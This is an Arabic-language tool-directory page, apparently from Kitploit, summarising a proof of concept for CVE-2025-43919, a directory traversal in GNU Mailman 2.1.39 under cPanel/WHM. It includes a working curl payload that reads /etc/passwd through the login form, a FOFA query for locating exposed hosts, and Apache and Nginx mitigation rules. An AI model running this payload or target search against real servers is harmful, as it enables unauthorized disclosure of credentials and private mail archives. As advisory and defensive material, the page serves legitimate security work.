Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-43919-POC — تم اكتشاف ثغرة أمنية جديدة في GNU Mailman 2.1.39، المضمنة مع cPanel/WHM، مما يسمح للمهاجمين عن بُعد غير الموثّقين بقراءة ملفات عشوائية على الخادم عبر عيب اجتياز الدليل. | Kitploit
أدوات/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

تم اكتشاف ثغرة أمنية جديدة في GNU Mailman 2.1.39، المضمنة مع cPanel/WHM، مما يسمح للمهاجمين عن بُعد غير الموثّقين بقراءة ملفات عشوائية على الخادم عبر عيب اجتياز الدليل.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
111منذ سنة واحدةلم تتم المراجعة بعد

🚨 CVE-2025-43919: اجتياز الدليل في GNU Mailman 2.1.39 (cPanel/WHM)

تم اكتشاف ثغرة جديدة في GNU Mailman 2.1.39 المضمن مع cPanel/WHM، مما يسمح للمهاجمين عن بُعد غير المصادق عليهم بقراءة ملفات عشوائية على الخادم عبر خلل في اجتياز الدليل.

📌 ملخص الثغرة:

  • النوع: اجتياز الدليل (بدون مصادقة)
  • المكوّن: برنامج CGI النصي private.py
  • النقطة المتأثرة: /mailman/private/mailman
  • التأثير: الكشف عن ملفات مثل /etc/passwd، وأرشيفات .mbox، وإعدادات Mailman
  • درجة CVSS: 5.8 (متوسطة)
  • معرف CVE: CVE-2025-43919

الحالة: لا يوجد تصحيح رسمي (Mailman 2.1.x هو إصدار منتهي الصلاحية)

🔥 إثبات المفهوم:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 سيناريوهات الاستغلال:

  • تفريغ /etc/passwd، أو configs، أو ملفات صندوق البريد
  • تسريب بيانات الاعتماد والأرشيفات الحساسة
  • الربط مع ثغرات أخرى لتنفيذ الأكواد عن بُعد أو تصعيد الصلاحيات

🛡️ التخفيف: منع الوصول إلى /mailman/private على مستوى خادم الويب:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

أو في Nginx:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ الانتقال إلى Mailman 3.x — 2.x هو إصدار منتهي الصلاحية ويفتقر إلى الحماية الحديثة

🔍 استعلام FOFA : app="Mailman"

📚 تعرف على المزيد، شارك بمسؤولية، وحافظ على أمان بنيتك التحتية.

🔒 تابع لمعرفة المزيد من ثغرات CVE الواقعية، وإثباتات المفهوم، ونصائح التقوية: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

تنزيل الأداة